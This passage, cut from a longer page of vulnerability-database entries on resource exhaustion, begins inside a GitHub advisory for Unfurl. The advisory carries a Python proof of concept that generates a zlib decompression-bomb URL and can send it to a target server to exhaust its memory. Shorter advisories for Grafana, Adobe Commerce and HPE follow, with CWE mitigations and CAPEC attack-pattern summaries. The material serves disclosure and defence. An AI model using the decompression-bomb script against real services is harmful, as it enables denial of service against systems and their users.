bytes\")\n print(f\" Base64 size: {len(b64_payload):,} bytes\")\n print(f\" URL length: {len(malicious_url):,} bytes\")\n\n # Save payload if requested\n if args.output:\n with open(args.output, \u0027w\u0027) as f:\n f.write(malicious_url)\n print(f\"\\n[+] Payload saved to: {args.output}\")\n\n # Display truncated payload\n print(f\"\\n[*] Malicious URL (truncated):\")\n print(f\" {malicious_url[:100]}...\")\n print(f\" (Full URL is {len(malicious_url):,} characters)\")\n\n # Save full payload for reference\n script_dir = os.path.dirname(os.path.abspath(__file__))\n payload_path = os.path.join(script_dir, \u0027bomb_payload.txt\u0027)\n with open(payload_path, \u0027w\u0027) as f:\n f.write(malicious_url)\n print(f\"\\n[+] Full payload saved to: {payload_path}\")\n\n # Verify the bomb works locally\n print(f\"\\n[*] Verifying bomb locally (limited test)...\")\n try:\n # Only decompress a small portion to verify it\u0027s valid\n test_data = zlib.decompress(compressed, bufsize=1024*1024) # 1MB max\n print(f\" \u2705 Bomb is valid - decompresses to zeros\")\n except Exception as e:\n print(f\" \u274c Error: {e}\")\n sys.exit(1)\n\n if args.generate_only:\n print(\"\\n[*] Generate-only mode. Not sending payload.\")\n sys.exit(0)\n\n if not args.test:\n print(f\"\"\"\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551 SAFETY CHECK \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\nTo actually test this vulnerability, run with --test flag.\n\nManual testing:\n1. Copy the payload URL from {payload_path}\n2. Submit it to the target Unfurl instance\n3. Monitor server memory usage\n\nExpected behavior if vulnerable:\n- Server memory usage spikes dramatically\n- Request hangs or times out\n- Server may crash or become unresponsive\n\nMitigation check:\nThe vulnerability is FIXED if zlib.decompress() is called with\na max_length parameter, e.g.:\n zlib.decompress(data, bufsize=10*1024*1024) # 10MB limit\n\"\"\")\n sys.exit(0)\n\n # Actually test (dangerous!)\n print(f\"\\n[!] SENDING BOMB TO {args.target}\")\n print(f\"[!] This may crash the target service!\")\n confirm = input(\" Type \u0027CONFIRM\u0027 to proceed: \")\n\n if confirm != \u0027CONFIRM\u0027:\n print(\" Aborted.\")\n sys.exit(0)\n\n print(f\"\\n[*] Submitting payload...\")\n result = test_vulnerability(args.target, malicious_url, timeout=60.0)\n\n print(f\"\\n[*] Results:\")\n print(f\" Timeout: {result[\u0027timeout\u0027]}\")\n print(f\" Response time: {result[\u0027response_time\u0027]:.2f}s\")\n print(f\" Error: {result[\u0027error\u0027]}\")\n print(f\" Memory exhaustion likely: {result[\u0027memory_exhaustion_likely\u0027]}\")\n\n if result[\u0027memory_exhaustion_likely\u0027]:\n print(f\"\"\"\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551 VULNERABILITY CONFIRMED \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\nThe target appears vulnerable to decompression bomb attacks.\n\nEvidence:\n- {result[\u0027error\u0027] or \u0027Abnormal response observed\u0027}\n\nRecommendation:\nAdd size limits to zlib.decompress() calls:\n\n # Before (vulnerable):\n inflated_bytes = zlib.decompress(decoded)\n\n # After (fixed):\n MAX_DECOMPRESSED_SIZE = 10 * 1024 * 1024 # 10MB\n inflated_bytes = zlib.decompress(decoded, bufsize=MAX_DECOMPRESSED_SIZE)\n\nOr use streaming decompression with size checks:\n\n decompressor = zlib.decompressobj()\n chunks = []\n total_size = 0\n for chunk in iter(lambda: compressed_data.read(4096), b\u0027\u0027):\n decompressed = decompressor.decompress(chunk)\n total_size += len(decompressed)\n if total_size \u003e MAX_SIZE:\n raise ValueError(\"Decompressed data too large\")\n chunks.append(decompressed)\n\"\"\")\n else:\n print(\"\\n[*] Target may not be vulnerable or attack was mitigated.\")\n\n\nif __name__ == \u0027__main__\u0027:\n main()\n```\n\n### Impact\nA remote, unauthenticated attacker can cause high memory usage and potentially crash the service. The impact depends on deployment limits (process memory, URL length limits, and request size limits).",
"id": "GHSA-h5qv-qjv4-pc5m",
"modified": "2026-04-10T17:18:36Z",
"published": "2026-01-29T15:31:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/obsidianforensics/unfurl/security/advisories/GHSA-h5qv-qjv4-pc5m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40036"
},
{
"type": "WEB",
"url": "https://github.com/RyanDFIR/unfurl/pull/243"
},
{
"type": "WEB",
"url": "https://github.com/RyanDFIR/unfurl/commit/7cc711a65b106742a21080b755f81c17b5725aa8"
},
{
"type": "WEB",
"url": "https://github.com/RyanDFIR/unfurl/releases/tag/v2026.04"
},
{
"type": "PACKAGE",
"url": "https://github.com/obsidianforensics/unfurl"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/dfir-unfurl-denial-of-service-via-unbounded-zlib-decompression"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Unfurl\u0027s unbounded zlib decompression allows decompression bomb DoS"
}
GHSA-H5RH-W6VM-9GHC
Vulnerability from github – Published: 2022-02-15 01:57 – Updated: 2023-10-02 13:18The snapshot feature in Grafana before 7.4.2 can allow an unauthenticated remote attackers to trigger a Denial of Service via a remote API call if a commonly used configuration is set.
Specific Go Packages Affected
github.com/grafana/grafana/pkg/middleware
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "6.7.3"
},
{
"fixed": "7.4.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-27358"
],
"database_specific": {
"cwe_ids": [
"CWE-306",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-14T17:47:34Z",
"nvd_published_at": "2021-03-18T20:15:00Z",
"severity": "MODERATE"
},
"details": "The snapshot feature in Grafana before 7.4.2 can allow an unauthenticated remote attackers to trigger a Denial of Service via a remote API call if a commonly used configuration is set.\n### Specific Go Packages Affected\ngithub.com/grafana/grafana/pkg/middleware",
"id": "GHSA-h5rh-w6vm-9ghc",
"modified": "2023-10-02T13:18:04Z",
"published": "2022-02-15T01:57:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27358"
},
{
"type": "WEB",
"url": "https://github.com/grafana/grafana/pull/31263"
},
{
"type": "WEB",
"url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md"
},
{
"type": "WEB",
"url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md#742-2021-02-17"
},
{
"type": "WEB",
"url": "https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-4-2"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20210513-0007"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H/E:U/RL:O/RC:R",
"type": "CVSS_V3"
}
],
"summary": "Denial of service in Grafana"
}
GHSA-H5VC-CXC2-3GXR
Vulnerability from github – Published: 2026-05-12 21:31 – Updated: 2026-05-12 21:31Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.
{
"affected": [],
"aliases": [
"CVE-2026-34650"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-12T20:16:36Z",
"severity": "HIGH"
},
"details": "Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.",
"id": "GHSA-h5vc-cxc2-3gxr",
"modified": "2026-05-12T21:31:33Z",
"published": "2026-05-12T21:31:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34650"
},
{
"type": "WEB",
"url": "https://helpx.adobe.com/security/products/magento/apsb26-49.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H5X8-4PMQ-84WH
Vulnerability from github – Published: 2022-05-13 01:37 – Updated: 2022-05-13 01:37A potential security vulnerability has been identified in HPE Content Manager Workgroup Service v9.00. The vulnerability could be remotely exploited to allow Denial of Service (DoS).
{
"affected": [],
"aliases": [
"CVE-2017-14360"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-11-08T14:29:00Z",
"severity": "HIGH"
},
"details": "A potential security vulnerability has been identified in HPE Content Manager Workgroup Service v9.00. The vulnerability could be remotely exploited to allow Denial of Service (DoS).",
"id": "GHSA-h5x8-4pmq-84wh",
"modified": "2022-05-13T01:37:38Z",
"published": "2022-05-13T01:37:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-14360"
},
{
"type": "WEB",
"url": "https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03006302"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/101792"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.
Mitigation
- Mitigation of resource exhaustion attacks requires that the target system either:
- The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
- The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
- recognizes the attack and denies that user further access for a given amount of time, or
- uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Ensure that protocols have specific limits of scale placed on them.
Mitigation
Ensure that all failures in resource allocation place the system into a safe posture.
CAPEC-147: XML Ping of the Death
An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.
CAPEC-227: Sustained Client Engagement
An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.
CAPEC-492: Regular Expression Exponential Blowup
An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.